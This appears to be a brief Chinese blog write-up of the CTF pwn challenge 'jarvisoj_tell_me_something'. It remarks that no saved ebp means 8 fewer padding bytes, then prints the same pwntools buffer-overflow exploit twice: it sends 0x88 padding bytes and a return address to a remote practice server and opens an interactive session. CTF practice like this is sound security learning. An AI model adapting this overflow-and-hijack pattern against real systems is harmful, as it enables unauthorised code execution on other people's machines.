jarvisoj_tell_me_something
简单题就是没有ebp少加8个字节就好了。
点击查看代码
from pwn import *
io=remote("node4.buuoj.cn",27315)
payload='a'*0x88+p64(0x400620)
io.sendline(payload)
io.interactive()
简单题就是没有ebp少加8个字节就好了。
from pwn import *
io=remote("node4.buuoj.cn",27315)
payload='a'*0x88+p64(0x400620)
io.sendline(payload)
io.interactive()
浙公网安备 33010602011771号